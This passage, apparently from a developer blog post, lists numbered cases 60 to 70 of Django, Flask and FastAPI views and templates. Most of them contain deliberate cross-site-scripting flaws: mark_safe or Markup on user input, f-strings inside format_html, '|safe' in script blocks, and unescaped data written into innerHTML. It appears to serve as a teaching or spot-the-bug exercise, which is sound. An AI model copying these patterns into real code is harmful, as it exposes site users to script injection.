class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 60 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">()</span> <span class="n">rendered</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">comment</span> <span class="ow">in</span> <span class="n">comments</span><span class="p">:</span> <span class="n">rendered</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sa">f</span><span class="sh">'</span><span class="s">&lt;div class=</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="s">&gt;&lt;strong&gt;</span><span class="si">{</span><span class="n">comment</span><span class="p">.</span><span class="n">author</span><span class="si">}</span><span class="s">&lt;/strong&gt;</span><span class="sh">'</span> <span class="sa">f</span><span class="sh">'</span><span class="s">: {{}}&lt;/div&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">comment</span><span class="p">.</span><span class="n">body</span> <span class="p">)</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">comments</span><span class="sh">"</span><span class="p">:</span> <span class="n">rendered</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Comments<span class="nt">&lt;/h1&gt;</span> {% for comment in rendered %} {{ comment }} {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 61 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># models.py </span><span class="kn">from</span> <span class="n">django.db</span> <span class="kn">import</span> <span class="n">models</span> <span class="kn">from</span> <span class="n">django.utils.safestring</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="k">class</span> <span class="nc">UserProfile</span><span class="p">(</span><span class="n">models</span><span class="p">.</span><span class="n">Model</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">CharField</span><span class="p">(</span><span class="n">max_length</span><span class="o">=</span><span class="mi">150</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">CharField</span><span class="p">(</span><span class="n">max_length</span><span class="o">=</span><span class="mi">50</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_username_display</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">username</span><span class="p">)</span> <span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">UserProfile</span> <span class="k">def</span> <span class="nf">profile_page</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="n">badge</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">'</span><span class="s">&lt;span class=</span><span class="sh">"</span><span class="s">badge role-{}</span><span class="sh">"</span><span class="s">&gt;{}&lt;/span&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">profile</span><span class="p">.</span><span class="n">role</span><span class="p">,</span> <span class="n">profile</span><span class="p">.</span><span class="nf">get_username_display</span><span class="p">(),</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">profile.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span><span class="sh">'</span><span class="s">badge</span><span class="sh">'</span><span class="p">:</span> <span class="n">badge</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# profile.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"profile-header"</span><span class="nt">&gt;</span> {{ badge }} <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 62 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Notification</span> <span class="k">def</span> <span class="nf">notifications_page</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">notifications</span> <span class="o">=</span> <span class="n">Notification</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span> <span class="n">user</span><span class="o">=</span><span class="n">request</span><span class="p">.</span><span class="n">user</span> <span class="p">).</span><span class="nf">values_list</span><span class="p">(</span><span class="sh">'</span><span class="s">message</span><span class="sh">'</span><span class="p">,</span> <span class="n">flat</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="n">safe_notifications</span> <span class="o">=</span> <span class="p">[</span><span class="nf">escape</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span> <span class="k">for</span> <span class="n">msg</span> <span class="ow">in</span> <span class="n">notifications</span><span class="p">]</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">notifications.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">notifications</span><span class="sh">'</span><span class="p">:</span> <span class="n">safe_notifications</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# notifications.html #} <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">notifications</span> <span class="o">=</span> <span class="p">[</span> <span class="p">{</span><span class="o">%</span> <span class="k">for</span> <span class="nx">msg</span> <span class="k">in</span> <span class="nx">notifications</span> <span class="o">%</span><span class="p">}</span> <span class="dl">"</span><span class="s2">{{ msg | safe }}</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="o">%</span> <span class="nx">endfor</span> <span class="o">%</span><span class="p">}</span> <span class="p">];</span> <span class="kd">function</span> <span class="nf">renderNotifications</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">notif-list</span><span class="dl">'</span><span class="p">);</span> <span class="nx">notifications</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="nx">container</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">+=</span> <span class="dl">'</span><span class="s1">&lt;li&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">msg</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;/li&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">renderNotifications</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;ul</span> <span class="na">id=</span><span class="s">"notif-list"</span><span class="nt">&gt;&lt;/ul&gt;</span> </code></pre> </div> <h3> Case 63 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># utils.py </span><span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">Markup</span> <span class="k">def</span> <span class="nf">format_comment_preview</span><span class="p">(</span><span class="n">author</span><span class="p">,</span> <span class="n">preview_text</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Returns a formatted comment preview for display.</span><span class="sh">"""</span> <span class="n">author_safe</span> <span class="o">=</span> <span class="nc">Markup</span><span class="p">(</span><span class="n">author</span><span class="p">)</span> <span class="n">preview_safe</span> <span class="o">=</span> <span class="nc">Markup</span><span class="p">(</span><span class="n">preview_text</span><span class="p">)</span> <span class="k">return</span> <span class="nc">Markup</span><span class="p">(</span> <span class="sh">'</span><span class="s">&lt;span class=</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="s">&gt;{}&lt;/span&gt;: {}</span><span class="sh">'</span> <span class="p">).</span><span class="nf">format</span><span class="p">(</span><span class="n">author_safe</span><span class="p">,</span> <span class="n">preview_safe</span><span class="p">)</span> <span class="c1"># views.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="kn">from</span> <span class="n">.utils</span> <span class="kn">import</span> <span class="n">format_comment_preview</span> <span class="k">def</span> <span class="nf">comment_feed</span><span class="p">():</span> <span class="n">comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">order_by</span><span class="p">(</span> <span class="n">Comment</span><span class="p">.</span><span class="n">created_at</span><span class="p">.</span><span class="nf">desc</span><span class="p">()</span> <span class="p">).</span><span class="nf">limit</span><span class="p">(</span><span class="mi">20</span><span class="p">).</span><span class="nf">all</span><span class="p">()</span> <span class="n">previews</span> <span class="o">=</span> <span class="p">[</span> <span class="nf">format_comment_preview</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">preview_text</span><span class="p">)</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">comments</span> <span class="p">]</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">feed.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">previews</span><span class="o">=</span><span class="n">previews</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# feed.html #} {% for preview in previews %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment-card"</span><span class="nt">&gt;</span> {{ preview }} <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h3> Case 64 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.contrib.auth.decorators</span> <span class="kn">import</span> <span class="n">login_required</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">BlogPost</span> <span class="nd">@login_required</span> <span class="k">def</span> <span class="nf">post_detail</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">post_id</span><span class="p">):</span> <span class="n">post</span> <span class="o">=</span> <span class="n">BlogPost</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">post_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">post_detail.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span><span class="sh">'</span><span class="s">post</span><span class="sh">'</span><span class="p">:</span> <span class="n">post</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# post_detail.html #} <span class="nt">&lt;h1&gt;</span>{{ post.title }}<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"share-bar"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">postTitle</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ post.title }}</span><span class="dl">"</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">shareMsg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Check out: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">postTitle</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">buildShareBar</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">share-bar</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">&lt;button onclick="sharePost(</span><span class="se">\'</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">msg</span> <span class="o">+</span> <span class="dl">'</span><span class="se">\'</span><span class="s1">)"&gt;Share&lt;/button&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span> <span class="nf">buildShareBar</span><span class="p">(</span><span class="nx">shareMsg</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 65 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Product</span> <span class="k">def</span> <span class="nf">product_card</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">product_id</span><span class="p">):</span> <span class="n">product</span> <span class="o">=</span> <span class="n">Product</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">product_id</span><span class="p">)</span> <span class="n">label</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sa">f</span><span class="sh">'</span><span class="s">&lt;span class=</span><span class="sh">"</span><span class="s">label label-</span><span class="si">{</span><span class="n">product</span><span class="p">.</span><span class="n">category</span><span class="si">}</span><span class="sh">"</span><span class="s">&gt;</span><span class="sh">'</span> <span class="sa">f</span><span class="sh">'</span><span class="si">{</span><span class="n">product</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="sh">'</span> <span class="sa">f</span><span class="sh">'</span><span class="s">&lt;/span&gt;</span><span class="sh">'</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">product_card.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">label</span><span class="sh">'</span><span class="p">:</span> <span class="n">label</span><span class="p">,</span> <span class="sh">'</span><span class="s">product</span><span class="sh">'</span><span class="p">:</span> <span class="n">product</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# product_card.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"product-card"</span><span class="nt">&gt;</span> {{ label }} <span class="nt">&lt;p&gt;</span>{{ product.description }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 66 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">django.utils.safestring</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Event</span> <span class="k">def</span> <span class="nf">event_banner</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">event_id</span><span class="p">):</span> <span class="n">event</span> <span class="o">=</span> <span class="n">Event</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">event_id</span><span class="p">)</span> <span class="n">sponsor_html</span> <span class="o">=</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">sponsor_name</span><span class="p">)</span> <span class="n">banner</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">'</span><span class="s">&lt;div class=</span><span class="sh">"</span><span class="s">banner</span><span class="sh">"</span><span class="s">&gt;</span><span class="sh">'</span> <span class="sh">'</span><span class="s">&lt;h2&gt;{}&lt;/h2&gt;</span><span class="sh">'</span> <span class="sh">'</span><span class="s">&lt;p&gt;Sponsored by: {}&lt;/p&gt;</span><span class="sh">'</span> <span class="sh">'</span><span class="s">&lt;/div&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">event</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="n">sponsor_html</span><span class="p">,</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">event.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">banner</span><span class="sh">'</span><span class="p">:</span> <span class="n">banner</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# event.html #} <span class="nt">&lt;section</span> <span class="na">class=</span><span class="s">"event-section"</span><span class="nt">&gt;</span> {{ banner }} <span class="nt">&lt;/section&gt;</span> </code></pre> </div> <h3> Case 67 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Review</span> <span class="k">def</span> <span class="nf">review_page</span><span class="p">(</span><span class="n">review_id</span><span class="p">):</span> <span class="n">review</span> <span class="o">=</span> <span class="n">Review</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">review_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">review.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">author</span><span class="o">=</span><span class="n">review</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="n">review</span><span class="p">.</span><span class="n">body</span><span class="p">,</span> <span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# review.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"review"</span><span class="nt">&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"review-body"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">author</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ author | tojson }}</span><span class="dl">"</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">body</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">body</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">function</span> <span class="nf">renderReview</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">review-body</span><span class="dl">'</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;strong&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">author</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/strong&gt;: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">body</span><span class="p">;</span> <span class="p">}</span> <span class="nf">renderReview</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 68 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">django.utils.safestring</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">UserProfile</span> <span class="k">def</span> <span class="nf">profile_badge</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">user_id</span><span class="p">):</span> <span class="n">profile</span> <span class="o">=</span> <span class="n">UserProfile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">user_id</span><span class="p">)</span> <span class="n">location</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span><span class="sh">'</span><span class="s">&lt;em&gt;{}&lt;/em&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">profile</span><span class="p">.</span><span class="n">location</span><span class="p">)</span> <span class="n">bio_preview</span> <span class="o">=</span> <span class="nf">mark_safe</span><span class="p">(</span> <span class="n">profile</span><span class="p">.</span><span class="n">bio</span><span class="p">[:</span><span class="mi">100</span><span class="p">]</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">profile</span><span class="p">.</span><span class="n">bio</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">100</span> <span class="k">else</span> <span class="n">profile</span><span class="p">.</span><span class="n">bio</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">'</span><span class="s">profile_badge.html</span><span class="sh">'</span><span class="p">,</span> <span class="p">{</span> <span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">:</span> <span class="n">profile</span><span class="p">.</span><span class="n">username</span><span class="p">,</span> <span class="sh">'</span><span class="s">location</span><span class="sh">'</span><span class="p">:</span> <span class="n">location</span><span class="p">,</span> <span class="sh">'</span><span class="s">bio_preview</span><span class="sh">'</span><span class="p">:</span> <span class="n">bio_preview</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# profile_badge.html #} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"badge"</span><span class="nt">&gt;</span> <span class="nt">&lt;h3&gt;</span>{{ username }}<span class="nt">&lt;/h3&gt;</span> <span class="nt">&lt;p&gt;</span>{{ location }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>{{ bio_preview }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> </code></pre> </div> <h3> Case 69 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">get_post_by_id</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/post/{post_id}</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">post_detail</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">post_id</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="n">post</span> <span class="o">=</span> <span class="nf">get_post_by_id</span><span class="p">(</span><span class="n">post_id</span><span class="p">)</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">post.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">title</span><span class="p">,</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">author</span><span class="p">,</span> <span class="sh">"</span><span class="s">tags</span><span class="sh">"</span><span class="p">:</span> <span class="n">post</span><span class="p">.</span><span class="n">tags</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>{# post.html #} <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"post-header"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"tag-list"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">title</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ title | tojson }}</span><span class="dl">"</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">author</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">author</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">var</span> <span class="nx">tags</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">tags</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="kd">function</span> <span class="nf">renderHeader</span><span class="p">()</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">post-header</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">&lt;h1&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">title</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;/h1&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;p&gt;By: </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">author</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;/p&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span> <span class="kd">function</span> <span class="nf">renderTags</span><span class="p">()</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">html</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">tags</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">tag</span><span class="p">)</span> <span class="p">{</span> <span class="nx">html</span> <span class="o">+=</span> <span class="dl">'</span><span class="s1">&lt;span class="tag"&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">tag</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;/span&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">});</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">tag-list</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">html</span><span class="p">;</span> <span class="p">}</span> <span class="nf">renderHeader</span><span class="p">();</span> <span class="nf">renderTags</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 70 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="kn">from</span> <span class="n">django.http</span> <span class="kn">import</span> <span class="n">JsonResponse</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Comment</span> <span class="k">def</span> <span class="nf">submit_comment</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">:</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">body</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">safe_body</span> <span class="o">=</span> 